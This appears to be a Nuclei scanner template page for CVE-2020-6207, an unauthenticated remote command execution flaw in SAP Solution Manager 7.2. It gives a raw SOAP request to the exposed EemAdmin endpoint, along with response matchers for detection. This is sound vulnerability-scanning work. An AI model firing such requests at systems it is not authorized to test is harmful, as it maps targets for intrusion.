SAP Solution Manager 7.2 - Remote Command Execution

ID: CVE-2020-6207

Severity: critical

Author: _generic_human_

Tags: cve2020,cve,sap,solman,rce,kev

Description

SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tcsmdagentapplicationeem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.

YAML Source

id: CVE-2020-6207

info:
  name: SAP Solution Manager 7.2 - Remote Command Execution
  author: _generic_human_
  severity: critical
  description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Apply the latest security patches provided by SAP to mitigate this vulnerability.
  reference:
    - https://launchpad.support.sap.com/#/notes/2890213
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305
    - https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
    - https://github.com/chipik/SAP_EEM_CVE-2020-6207
    - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/
    - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6207
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-6207
    cwe-id: CWE-306
    epss-score: 0.97439
    epss-percentile: 0.99945
    cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: solution_manager
  tags: cve2020,cve,sap,solman,rce,kev

http:
  - raw:
      - |
        POST /EemAdminService/EemAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml; charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ":Envelope"
          - ":Body"
          - ":getAllAgentInfoResponse"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"
          - "SAP NetWeaver Application Server"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205ac1dea476a0e0189e2356bf63a8c7453e958c58fbdb99842df0bf8bf53fe7f502205ee7fb99bc1d0786a34a1320da4e4c73053a0d3a76b1077416c0ab1a21644a6c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-6207.yaml"

View on Github